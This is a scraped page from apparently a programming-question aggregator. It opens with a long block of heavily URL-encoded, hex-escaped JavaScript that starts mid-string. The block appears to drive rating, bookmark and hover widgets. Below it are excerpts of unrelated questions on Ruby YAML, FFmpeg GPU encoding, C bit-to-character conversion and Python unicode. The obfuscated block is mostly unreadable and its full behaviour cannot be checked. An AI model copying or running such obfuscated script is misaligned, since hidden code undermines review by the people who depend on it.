2578%2536%2539%255Cx%25364%255Cx%2533%2564%255C%2578%25322%255cx%2537%2534%255c%2578%25368%255c%25787%2535%255c%25786%2564%255Cx%25362%255c%25787%2533%255Cx%2533%2532%255Cx%25322%255c%2578%2533e%255C%25783%2563%255c%25787%2533%255C%25787%2530%255Cx%2536%2531%255cx%2536%2565%255cx%2533e%255C%2578%2532%2564%255c%25783%2563%255c%25782%2566%255C%2578%2537%2533%255cx%2537%2530%255Cx%2536%2531%255C%2578%2536%2565%255cx%2533e%255C%25783%2563%255cx%25373%255Cx%25370%255Cx%25361%255cx%2536e%255cx%2533e%255Cx%2532d%255c%2578%2533%2563%255c%25782%2566%255Cx%2537%2533%255C%2578%25370%255c%25786%2531%255c%2578%2536e%255C%2578%2533%2565%255C%2578%2533%2563%255c%25782%2566%255cx%2536%2534%255c%25786%2539%255Cx%2537%2536%255cx%2533%2565%2522%2529%253b%2524%2528%2522%255Cx%25323%255C%25787%2534%255cx%2536%2538%255cx%25375%255cx%2536d%255C%2578%25362%255cx%2537%2533%2522%2529%252e%2568%2574m%256c%2528%2522%255cx%2533%2563%255Cx%2537%2533%255Cx%2537%2530%255Cx%2536%2531%255cx%2536e%255C%2578%25320%255C%2578%25369%255C%25786%2534%255C%25783%2564%255Cx%25322%255c%25787%2534%255c%25786%2564%255c%25787%2533%255C%25786%2537%255cx%25322%255cx%2533e%255cx%2533c%255Cx%25373%255cx%2537%2530%255Cx%25361%255C%2578%2536%2565%255cx%2533e%255Cx%2533c%255C%25782%2566%255C%2578%25373%255cx%25370%255cx%25361%255cx%2536e%255c%2578%2533e%255c%25783%2563%255cx%2532%2566%255C%2578%25373%255cx%2537%2530%255C%25786%2531%255c%2578%2536e%255cx%2533%2565%255c%25783%2563%255c%2578%2536%2534%255Cx%2536%2539%255C%2578%25376%255Cx%2532%2530%255Cx%25369%255cx%25364%255c%25783%2564%255cx%2532%2532%255cx%2537%2534%255Cx%2536%2534%255cx%2536f%255C%2578%2532%2532%255Cx%2533e%255c%25783%2563%255C%25782%2566%255cx%2536%2534%255cx%25369%255Cx%2537%2536%255c%25783%2565%255cx%2533c%255C%25786%2534%255Cx%25369%255cx%2537%2536%255c%2578%25320%255Cx%25369%255cx%2536%2534%255cx%2533d%255C%25782%2532%255c%2578%25374%255c%2578%2537%2535%255Cx%2537%2530%255C%25782%2532%255C%25783%2565%255c%25783%2563%255c%25782%2566%255Cx%25364%255C%25786%2539%255c%2578%25376%255c%2578%2533%2565%2522%2529%252e%2566%2569n%2564%2528%2522%255c%25782%2533%255C%2578%25374%255c%25786%2564%255C%25787%2533%255Cx%25367%2522%2529%252eh%2569d%2565%2528%2529%253B%257d%2524%2528%2522%255Cx%2532%2533%255c%25787%2534%255cx%2536f%255Cx%2537%2530%2522%2529%252e%2568o%2576e%2572%2528f%2575%256Ec%2574i%256fn%2528%2529%257b%2524%2528%2522%255c%25782%2533%255C%25787%2533%255c%25787%2534%255C%25786%2531%255cx%25372%255C%25782%2530%255Cx%2536%2539%255C%25786%2564%255C%25786%2537%2522%2529%252Es%2574%256fp%2528%2529%252Ea%256e%2569m%2561%2574%2565%2528%257B%256Fp%2561%2563%2569t%2579%253a%25280%2578%25376%2530%252B6%25395%2534%252d%2530%25782%2532%2538a%2529%257D%2529%253b%2524%2528%2522%255C%25782%2533%255Cx%2537%2533%255cx%2536%2538%255c%25786%2531%255C%2578%25372%255c%2578%2536%2535%255c%2578%25331%2522%2529%252Es%2574o%2570%2528%2529%252ea%256Ei%256Da%2574%2565%2528%257bo%2570%2561c%2569t%2579%253a%25280%2578e%25615%252B5%25371%2538%252d0%2578%2532%2534f%2562%2529%257D%252C%2528%2530x%2533a%2530+%2538%2530%2533%252d0%2578%2535%2533%2533%2529%252Cf%2575%256ec%2574i%256fn%2528%2529%257b%2524%2528%2574%2568%2569s%2529%252eh%2569d%2565%2528%2529%253b%257D%2529%253b%257d%252c%2566%2575n%2563t%2569%256F%256e%2528%2529%257B%2524%2528%2522%255Cx%2532%2533%255C%25787%2533%255cx%2537%2534%255Cx%25361%255Cx%2537%2532%255cx%25320%255Cx%2536%2539%255cx%2536%2564%255cx%2536%2537%2522%2529%252es%2574o%2570%2528%2529%252ea%256E%2569%256Da%2574%2565%2528%257Bo%2570%2561%2563i%2574y%253A%2528%2530x%2531%2537c%2566+%25318%2534%2530%252d%2530x%2531%2565%2566e%2529%257D%2529%253B%2524%2528%2522%255c%25782%2533%255cx%2537%2533%255c%2578%25368%255Cx%25361%255Cx%25372%255cx%25365%255Cx%25331%2522%2529%252es%2568%256F%2577%2528%2529%252e%2573%2574o%2570%2528%2529%252E%2561n%2569%256Da%2574e%2528%257bo%2570%2561%2563i%2574y%253A%2528%2530%25781%2537%2561%2564%252B3%2535%25346%252d%2530x%25325%2538%2536%2529%257d%2529%253b%257d%2529%253b%2524%2528%2522%255C%25782%2533%255c%25787%2533%255Cx%25374%255c%2578%25361%255cx%2537%2532%2522%2529%252E%2563%256c%2569%2563%256B%2528f%2575n%2563%2574i%256Fn%2528%2529%257Ba%256Ce%2572%2574%2528%2522%255cx%2535%2530%255c%2578%2537%2532%255Cx%2536%2535%255Cx%25373%255cx%2537%2533%255c%2578%2532%2530%255Cx%25322%2522+%2528n%2561%2576i%2567a%2574o%2572%252ea%2570%2570%2556e%2572s%2569%256F%256e%252ei%256Ed%2565x%254ff%2528%2522%255C%2578%2534d%255C%2578%25361%255Cx%25363%2522%2529%2521%253D%252D%2528%2530x%2565%2531%2564%252b%25338%25304%252d0%2578%2531c%2566%2538%2529%253f%2522%255c%2578%2534%2533%255C%2578%2536d%255Cx%2536%2534%2522%253a%2522%255C%25784%2533%255cx%2537%2534%255Cx%25372%255C%2578%2536c%2522%2529+%2522%255C%2578%2532%2532%255cx%25320%255c%2578%25361%255C%25786%2565%255c%25786%2534%255C%25782%2530%255c%2578%2532%2532%255Cx%25344%255Cx%2532%2532%255c%2578%25320%255cx%2536%2566%255c%2578%2536e%255C%25782%2530%255c%2578%2537%2539%255c%25786%2566%255c%2578%25375%255C%2578%2537%2532%255c%25782%2530%255c%25786%2562%255Cx%25365%255c%25787%2539%255Cx%25362%255C%2578%2536f%255cx%2536%2531%255C%25787%2532%255c%25786%2534%255cx%2532%2530%255Cx%25374%255Cx%2536%2566%255Cx%25320%255C%2578%25362%255C%2578%2536f%255C%25786%2566%255C%2578%2536b%255cx%2536%2564%255Cx%2536%2531%255C%25787%2532%255Cx%2536%2562%255cx%25320%255Cx%2537%2534%255C%2578%25368%255cx%25369%255cx%2537%2533%255c%25782%2530%255C%25787%2537%255c%2578%2536%2535%255cx%25362%255c%25782%2530%255c%2578%25370%255C%2578%25361%255Cx%25367%255cx%2536%2535%255c%2578%2532e%2522%2529%253Bz%25333%25309%25668%2566%2532a%2561%2528%2529%253b%257D%2529%253b%2524%2528%2522%255C%2578%2532%2533%255c%25787%2533%255C%2578%2537%2534%255Cx%25361%255Cx%2537%2532%255C%2578%2532%2563%255C%2578%2532%2533%255cx%2536%2531%255cx%25364%255Cx%2536%2534%255c%2578%25361%255c%2578%25372%255Cx%2537%2532%2522%2529%252E%2568%256f%2576%2565r%2528f%2575%256ec%2574i%256f%256E%2528%2529%257bi%2566%2528%2524%2528%2522%255C%25782%2533%255C%25786%2531%255cx%25364%255C%25786%2534%255C%25787%2532%255Cx%25365%255cx%25373%255c%2578%25373%2522%2529%252e%2561t%2574%2572%2528%2522%255c%2578%25363%255cx%2536c%255Cx%2536%2531%255c%2578%25373%255c%25787%2533%2522%2529%253d%253D%2522%255c%2578%2536c%255c%25786%2566%255cx%25361%255c%25786%2534%255c%25786%2539%255C%25786%2565%255c%25786%2537%2522%2529%257br%2565t%2575%2572n%253B%257Dc%256C%2565%2561%2572T%2569%256de%256f%2575t%2528z%2532f%2561%25642%2564%2534%2563%2565c%2529%253b%2524%2528%2522%255cx%25323%255Cx%2536%2531%255c%25786%2534%255C%2578%25364%255Cx%25372%255Cx%25365%255Cx%2537%2533%255c%2578%25373%255C%2578%2532%2530%255c%2578%2537%2533%255c%25787%2534%255c%25787%2532%255cx%2536%2566%255cx%2536e%255Cx%25367%2522%2529%252E%2568%2574%256Dl%2528%2522%255cx%2535%2539%255cx%2536%2566%255c%2578%2537%2535%255C%2578%25327%255c%2578%2537%2532%255cx%2536%2535%255C%25782%2530%255Cx%2537%2536%255Cx%25369%255Cx%25373%255C%25786%2539%255c%2578%25374%255c%25786%2539%255cx%2536e%255cx%25367%255C%2578%2533%2561%2522%2529%253b%2524%2528%2522%255c%2578%25323%255Cx%2536%2531%255c%2578%2536%2534%255Cx%2536%2534%255cx%2537%2532%255C%2578%25365%255C%25787%2533%255cx%2537%2533%2522%2529%252es%2568o%2577%2528%2529%252ea%256ei%256da%2574%2565%2528%257Bt%256F%2570%253A%2528%2530x%25310%2561%2534+%2532%25354%2539%252d0%2578%2531a%25399%2529%257D%252C%25280%25786%25335%252B1%2539%2539%252D0%25786%25334%2529%2529%253b%257D%252cf%2575n%2563t%2569%256Fn%2528%2529%257B%257A2%25362%2534%2531d%2561%2537c%2537%2528%2529%253B%257d%2529%253B%2524%2528%2522%255cx%25323%255Cx%2536%2531%255cx%25364%255Cx%2536%2534%255c%2578%2537%2532%255cx%2536%2535%255c%2578%2537%2533%255c%2578%2537%2533%2522%2529%252e%2568o%2576e%2572%2528f%2575%256ec%2574i%256f%256e%2528%2529%257bc%256C%2565%2561%2572T%2569m%2565o%2575t%2528%257a2%2566%2561d%2532d%2534%2563%2565c%2529%253B%257d%252c%2566u%256ec%2574i%256f%256e%2528%2529%257B%257A%25326%2532%2534%2531%2564a%2537c%2537%2528%2529%253B%257D%2529%253B%2524%2528%2522%255Cx%25323%255c%25787%2534%255C%25786%2538%255c%2578%25375%255cx%2536%2564%255C%2578%25362%255cx%25373%2522%2529%252E%2568o%2576%2565%2572%2528%2566%2575%256ec%2574%2569o%256e%2528%2529%257B%2524%2528%2522%255C%2578%25323%255Cx%2537%2534%255c%2578%2536%2538%255Cx%2537%2535%255c%25786%2564%255cx%25362%255c%25787%2533%255C%25782%2530%255C%25782%2533%255c%25787%2534%255Cx%2536d%255C%25787%2533%255c%2578%2536%2537%2522%2529%252e%2573t%256f%2570%2528%2529%252Es%2568o%2577%2528%2529%252e%2561n%2569%256d%2561t%2565%2528%257B%256d%2561%2572g%2569%256e%2554o%2570%253A%252d%2528%2530%2578%25371%2532%252B%25356%2530%252d0%2578%2539%25309%2529%257d%252c%2528%2530x%2532%2536%2566+%2531%25315%2534%252d0%25786%2538%2564%2529%252cf%2575n%2563t%2569%256F%256E%2528%2529%257B%2524%2528t%2568%2569s%2529%252e%2573%2568%256f%2577%2528%2529%253b%257D%2529%253b%257D%252c%2566%2575%256E%2563%2574%2569%256fn%2528%2529%257B%2524%2528%2522%255cx%25323%255c%25787%2534%255c%2578%2536%2538%255Cx%25375%255cx%2536d%255cx%2536%2532%255Cx%25373%255C%25782%2530%255cx%25323%255C%25787%2534%255c%2578%2536d%255C%2578%25373%255C%2578%2536%2537%2522%2529%252Es%2574o%2570%2528%2529%252E%2561n%2569%256d%2561t%2565%2528%257bm%2561%2572g%2569n%2554%256fp%253A%2528%2530%25781%2534%25626%252b5%2539%252D%2530x%2531%2534f%2531%2529%257d%252c%2528%2530%2578%25360%2562+%2531%25356%2534%252D%2530x%25625%2566%2529%252cf%2575%256E%2563t%2569o%256E%2528%2529%257b%2524%2528%2574h%2569s%2529%252E%2568i%2564%2565%2528%2529%253b%257D%2529%253B%257D%2529%253B%2524%2528%2522%255Cx%2532%2533%255cx%25374%255cx%2536%2538%255C%25787%2535%255cx%2536%2564%255C%25786%2532%255c%25787%2533%255Cx%2532%2530%255cx%2532%2533%255Cx%25374%255c%25786%2534%255c%2578%2536f%2522%2529%252Eh%256fv%2565r%2528f%2575n%2563%2574i%256Fn%2528%2529%257B%2524%2528%2522%255Cx%25323%255Cx%2537%2534%255c%25786%2538%255C%2578%2537%2535%255C%25786%2564%255C%25786%2532%255C%25787%2533%255c%2578%25320%255Cx%25323%255cx%2537%2534%255C%25786%2564%255Cx%25373%255c%25786%2537%2522%2529%252e%2572%2565m%256f%2576%2565C%256C%2561s%2573%2528%2522%255c%2578%2537%2534%255cx%25375%255cx%2537%2530%2522%2529%252e%2561d%2564C%256C%2561s%2573%2528%2522%255c%25787%2534%255cx%2536%2534%255cx%2536f%2522%2529%253b%2524%2528%2522%255Cx%25323%255cx%25374%255c%25786%2538%255Cx%2537%2535%255Cx%2536d%255cx%2536%2532%255Cx%25373%255c%25782%2530%255c%25782%2533%255C%25787%2534%255cx%2536%2564%255Cx%25373%255Cx%25367%255c%25782%2530%255c%25787%2533%255c%2578%25370%255Cx%2536%2531%255C%25786%2565%2522%2529%252Eh%2574%256Dl%2528%2522%255cx%2535%2534%255C%2578%2536%2538%255cx%2536%2539%255cx%25373%255c%25782%2530%255Cx%25364%255Cx%2536f%255C%2578%2537%2537%255Cx%2536e%255C%2578%2536c%255C%2578%2536%2566%255cx%25361%255Cx%2536%2534%255C%25782%2530%255cx%2536%2534%255C%2578%2536f%255c%25786%2535%255C%2578%25373%255c%2578%2533c%255c%2578%2536%2532%255cx%2537%2532%255Cx%25320%255c%25782%2566%255C%2578%2533%2565%255cx%2533%2563%255c%25787%2533%255c%2578%25370%255c%25786%2531%255c%2578%2536e%255cx%25320%255c%2578%25363%255C%2578%2536%2563%255c%25786%2531%255Cx%25373%255cx%2537%2533%255cx%2533d%255Cx%2532%2532%255C%2578%25362%255cx%2536%2566%255c%2578%2536%2563%255C%2578%25364%255Cx%2532%2532%255cx%2533e%255c%25783%2563%255C%25787%2533%255Cx%25370%255C%25786%2531%255Cx%2536%2565%255Cx%2532%2530%255Cx%2536%2533%255cx%2536c%255Cx%25361%255Cx%25373%255Cx%2537%2533%255C%2578%2533d%255C%2578%25322%255cx%25375%255c%25786%2563%255C%25786%2539%255cx%2536e%255c%25786%2535%255cx%2532%2532%255Cx%2533%2565%255c%2578%2536%2565%255cx%2536%2566%255Cx%25374%255cx%2533%2563%255Cx%2532f%255cx%2537%2533%255cx%2537%2530%255cx%25361%255Cx%2536e%255C%25783%2565%255c%25782%2530%255cx%25377%255cx%2536f%255c%25787%2532%255C%2578%2536%2562%255Cx%2533%2563%255cx%2532%2566%255Cx%2537%2533%255Cx%25370%255c%25786%2531%255Cx%2536%2565%255c%2578%2533e%255cx%25320%255C%25786%2566%255c%25787%2532%255cx%2532%2530%255c%2578%25369%255c%2578%25373%255Cx%2536e%255C%25782%2537%255C%2578%25374%255C%25783%2563%255cx%25362%255C%25787%2532%255C%25782%2530%255c%2578%2532f%255cx%2533e%255Cx%25377%255Cx%2536%2538%255Cx%25361%255C%25787%2534%255cx%2532%2530%255c%25784%2539%255c%25782%2530%255c%2578%2536%2535%255C%25787%2538%255c%25787%2530%255Cx%2536%2535%255C%25786%2533%255cx%25374%255c%25786%2535%255cx%2536%2534%255Cx%2532e%2522%2529%253b%257d%2529%253b%2524%2528%2522%255c%2578%25323%255Cx%2537%2534%255C%25786%2538%255C%25787%2535%255Cx%2536%2564%255Cx%2536%2532%255c%25787%2533%255cx%25320%255c%25782%2533%255cx%2537%2534%255c%25787%2535%255Cx%2537%2530%2522%2529%252Eh%256F%2576e%2572%2528f%2575%256e%2563%2574%2569%256F%256E%2528%2529%257B%2524%2528%2522%255c%2578%2532%2533%255C%2578%2537%2534%255c%25786%2538%255c%2578%25375%255c%25786%2564%255cx%25362%255c%2578%2537%2533%255C%2578%25320%255Cx%25323%255c%2578%2537%2534%255Cx%2536d%255Cx%25373%255c%25786%2537%2522%2529%252E%2572e%256D%256fv%2565%2543l%2561s%2573%2528%2522%255cx%2537%2534%255c%25786%2534%255Cx%2536%2566%2522%2529%252E%2561%2564%2564C%256c%2561%2573%2573%2528%2522%255cx%2537%2534%255C%2578%2537%2535%255Cx%25370%2522%2529%253B%2524%2528%2522%255Cx%25323%255Cx%2537%2534%255Cx%25368%255cx%25375%255cx%2536d%255c%2578%25362%255Cx%2537%2533%255cx%2532%2530%255Cx%25323%255Cx%2537%2534%255Cx%2536%2564%255Cx%25373%255cx%2536%2537%255Cx%2532%2530%255c%25787%2533%255cx%2537%2530%255c%25786%2531%255cx%2536e%2522%2529%252Eh%2574m%256C%2528%2522%255C%2578%25349%255Cx%2532%2530%255Cx%2536%2538%255Cx%2536%2531%255c%2578%2537%2536%255cx%25365%255cx%2532%2530%255Cx%25364%255cx%2536f%255Cx%25377%255c%25786%2565%255cx%2536%2563%255cx%2536f%255cx%25361%255cx%2536%2534%255C%2578%25365%255Cx%25364%255c%2578%2533%2563%255C%2578%25362%255c%25787%2532%255C%2578%25320%255Cx%2532%2566%255c%2578%2533e%255cx%2537%2534%255C%2578%2536%2538%255Cx%2536%2539%255c%25787%2533%255C%25782%2530%255Cx%2536%2531%255c%2578%2536e%255cx%25364%255C%25782%2530%255c%25786%2539%255c%2578%2537%2534%255cx%25320%255C%2578%2533%2563%255Cx%25373%255cx%2537%2534%255Cx%2537%2532%255C%2578%2536%2566%255cx%2536e%255c%2578%25367%255cx%2533%2565%255cx%25377%255cx%2536f%255C%2578%2537%2532%255cx%2536%2562%255C%25787%2533%255Cx%25320%255c%25782%2536%255Cx%2536%2565%255Cx%2536%2532%255C%2578%25373%255Cx%25370%255Cx%2533b%255cx%2532%2530%255C%25782%2536%255cx%2536e%255Cx%25362%255c%25787%2533%255cx%2537%2530%255c%2578%2533%2562%255Cx%2532%2530%255Cx%25326%255C%2578%2536e%255cx%25362%255Cx%25373%255cx%2537%2530%255cx%2533b%255Cx%2533%2563%255Cx%2536%2532%255Cx%2537%2532%255cx%25320%255Cx%2532f%255C%2578%2533%2565%255cx%2536%2537%255c%2578%25372%255C%2578%25365%255C%2578%2536%2531%255C%25787%2534%255C%25783%2563%255cx%2532f%255cx%2537%2533%255Cx%2537%2534%255cx%25372%255C%2578%2536%2566%255C%2578%2536%2565%255cx%2536%2537%255cx%2533%2565%255C%25782%2531%255C%25782%2536%255cx%2536e%255cx%2536%2532%255cx%25373%255Cx%25370%255Cx%2533b%255c%25782%2530%255c%25782%2536%255C%25786%2565%255Cx%2536%2532%255C%25787%2533%255Cx%25370%255Cx%2533%2562%255cx%2532%2530%255c%2578%2532%2536%255Cx%2536e%255c%25786%2532%255cx%25373%255C%25787%2530%255cx%2533%2562%2522%2529%253b%257d%2529%253B%2524%2528%2522%255c%25782%2533%255Cx%2537%2534%255C%2578%2536%2538%255Cx%25375%255Cx%2536%2564%255cx%2536%2532%255C%25787%2533%255Cx%2532%2530%255C%2578%2532%2533%255Cx%25374%255Cx%25364%255cx%2536f%2522%2529%252e%2563%256ci%2563%256B%2528%2566%2575%256E%2563%2574i%256Fn%2528%2529%257Bw%2569n%2564o%2577%255b%2522%255Cx%25350%255Cx%2534%2534%255cx%25352%255Cx%25354%255c%2578%2534a%255Cx%25353%255Cx%2535f%2522%252b%2572a%2574e%2569%2564%255D%252ez%25614%2564d%2530%2565%2564c%25660%2528%25280%25788%25620%252b%25357%2535%2534%252d%2530%2578%2531%2566%2532%2538%2529%2529%253B%2524%2528%2524%2528%2522%255c%2578%25323%255C%25787%2530%255C%2578%2536%2566%255c%25786%2563%255Cx%2536c%255c%25783%2531%2522%2529%252el%2565n%2567%2574h%2526%2526%2524%2528%2522%255c%2578%2532%2533%255Cx%25370%255Cx%2536%2566%255cx%2536c%255cx%2536c%255C%2578%2533%2531%2522%2529%252ei%2573%2528%2522%255c%25783%2561%255c%25787%2536%255cx%25369%255C%2578%25373%255C%2578%25369%255cx%2536%2532%255C%25786%2563%255cx%2536%2535%2522%2529%253f%2522%255cx%2532%2533%255c%25787%2530%255C%25786%2566%255C%2578%2536%2563%255C%25786%2563%255C%25783%2531%2522%253a%2522%255c%2578%25323%255cx%25370%255Cx%2536%2535%255C%25787%2532%255c%2578%2536%2533%255cx%2536%2535%255cx%2536e%255Cx%2537%2534%2522%2529%252e%2566%2561%2564e%254F%2575%2574%2528%2522%2522%252Cf%2575%256E%2563%2574i%256f%256E%2528%2529%257b%2524%2528%2522%255c%25782%2533%255Cx%25370%255Cx%2536%2535%255cx%2537%2532%255cx%2536%2533%255C%25786%2535%255Cx%2536e%255Cx%2537%2534%2522%2529%252ea%2566%2574e%2572%2528%2522%255c%2578%2533%2563%255C%25786%2534%255C%2578%25369%255C%2578%25376%255cx%25320%255C%2578%25369%255C%2578%25364%255c%2578%2533%2564%255cx%25322%255Cx%25370%255C%2578%2536f%255C%25786%2563%255cx%2536%2563%255c%2578%2533%2532%255c%2578%2532%2532%255c%25783%2565%255Cx%2533%2563%255c%25786%2534%255c%2578%2536%2539%255cx%2537%2536%255cx%25320%255C%25786%2539%255C%25786%2534%255c%2578%2533d%255cx%2532%2532%255Cx%25350%255c%2578%25344%255C%2578%2534%2539%255C%2578%2535%2566%255C%25786%2533%255Cx%2536%2566%255c%25786%2565%255c%2578%2537%2534%255cx%2536%2531%255Cx%2536%2539%255cx%2536%2565%255Cx%25365%255C%2578%25372%2522+%2570o%256c%256c%2569d%252B%2522%255c%2578%2532%2532%255C%25783%2565%255C%25784%2563%255cx%2536f%255C%25786%2531%255c%2578%25364%255Cx%2536%2539%255C%25786%2565%255C%25786%2537%255c%2578%2532e%255c%2578%2532e%255c%2578%2532%2565%255cx%2533%2563%255Cx%2532f%255cx%2536%2534%255Cx%25369%255c%25787%2536%255C%2578%2533%2565%255Cx%2533c%255C%25782%2566%255Cx%2536%2534%255c%25786%2539%255c%25787%2536%255c%2578%2533e%2522%2529%253b%2524%2528%2522%255c%25782%2533%255Cx%25370%255Cx%2536f%255cx%2536%2563%255Cx%2536c%255cx%2533%2532%2522%2529%252eh%2569d%2565%2528%2529%253b%2524%252e%2567%2565t%2553%2563r%2569%2570t%2528%257A%2563%2536%2538%2566c%25341%25383%2533+%2522%255C%25787%2533%255C%25787%2534%255C%25786%2531%255C%2578%2537%2534%255cx%25369%255C%2578%2536%2533%2522+%257a%2565e%25364%25361%2533%2538%2536%2534+%257Ad%25661%2562%2563%2536%25384%2563b%252bz%2565e%2536%25346%25313%25386%2534%252b%257A6%2562a%2534%25317%25310%2563%2539%252bz%2531%25300%2561%25389%25332%2564%2537%252b%2522%255Cx%25370%2522+%257a%2531%2530%2530%2561%2538%25393%2532d%2537%252B%2570%256f%256c%256Ci%2564%252b%257A%2565%2565%2536%25346%25313%2538%25364%252b%2522%255Cx%2536a%255c%2578%2537%2533%2522%252Cf%2575n%2563%2574%2569o%256E%2528%2529%257B%2524%2528%2522%255cx%2532e%255C%2578%2537%2530%255Cx%25364%255cx%25373%255Cx%2532%2564%255C%25786%2531%255C%25786%2565%255Cx%2537%2533%255cx%2537%2537%255Cx%25365%255c%25787%2532%255Cx%25

    Read the article

  • Ruby custom class to and from YAML;

    - by Sanarothe
    Hi. I'm having trouble deserializing a ruby class that I wrote to YAML. Where I want to be I want to be able to pass one object around as a full 'question' which includes the question text, some possible answers (For multi. choice) and the correct answer. One module (The encoder) takes input, builds a 'question' class out of it and appends it to the question pool. Another module reads a question pool and builds an array of 'question' objects. Where I am currently Sample Question Pool --- | --- !ruby/object:MultiQ a: "no" answer: "no" b: "no" c: "no" d: "no" text: "yes?" Encoder dump to YAML file. Object is a MultiQ filled up with input. (See below.) def dump(file, object) File.open(file, 'a') do |out| YAML.dump(object.to_yaml, out) end object = nil end MultiQ Class definition class MultiQ attr_accessor :text, :answer, :a, :b, :c, :d def initialize(text, answer, a, b, c, d) @text = text @answer = answer @a = a @b = b @c = c @d = d end end The decoder (I've been trying different things, so what's here wasn't my first or best guess. But I'm at a loss and the documentation doesn't really explain things thoroughly enough.) File.open( "test_set.yaml" ) do |yf| YAML.load_documents( yf ) { |item| new = YAML.object_maker( MultiQ, item) puts new } end Questions you can answer How do I achieve my goal? What methods should I use, between parsing, loading files or documents, to successfully deserialize a Ruby class? I've already looked over the YAML Rdoc, and I didn't absorb very much, so please don't just link me to it. What other methods would you suggest using? Is there a better way to store questions like this? Should I be using document db, relational db, xml? Some other format?

    Read the article

  • Does FFMpeg support gpu acceleration of media encoding/decoding?

    - by Jason123
    I was wondering if ffmpeg supported gpu acceleration. I was reading on their websites and came across contradicting information. http://www.ffmpeg.org/general.html#Video-Codecs -H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (VDPAU acceleration) http://ffmpeg.org/trac/ffmpeg/wiki/x264EncodingGuide -Will a graphics card make x264 encode faster? No. libx264 doesn't use them (at least not yet). There are some proprietary encoders that utilize the GPU, but that does not mean they are well optimized, though encoding time may be faster; and they might be worse than x264 anyway, and possibly slower. Regardless, FFmpeg today doesn't support any means of gpu encoding, outside of libx264. If not, is there any way to add gpu acceleration to h.264 encoding/decoding?

    Read the article

  • Easy way to convert a string of 0's and 1's into a character? Plain C

    - by Nick
    I'm doing a steganography project where I read in bytes from a ppm file and add the least significant bit to an array. So once 8 bytes are read in, I would have 8 bits in my array, which should equal some character in a hidden message. Is there an easy way to convert an array of 0's and 1's into an ascii value? For example, the array: char bits[] = "0,1,1,1,0,1,0,0" would equal 't'. Plain C

    Read the article

  • Can I turn off implicit Python unicode conversions to find my mixed-strings bugs?

    - by Tal Weiss
    When profiling our code I was surprised to find millions of calls to C:\Python26\lib\encodings\utf_8.py:15(decode) I started debugging and found that across our code base there are many small bugs, usually comparing a string to a unicode or adding a sting and a unicode. Python graciously decodes the strings and performs the following operations in unicode. How kind. But expensive! I am fluent in unicode, having read Joel Spolsky and Dive Into Python... I try to keep our code internals in unicode only. My question - can I turn off this pythonic nice-guy behavior? At least until I find all these bugs and fix them (usually by adding a u'u')? Some of them are extremely hard to find (a variable that is sometimes a string...). Python 2.6.5 (and I can't switch to 3.x).

    Read the article

< Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >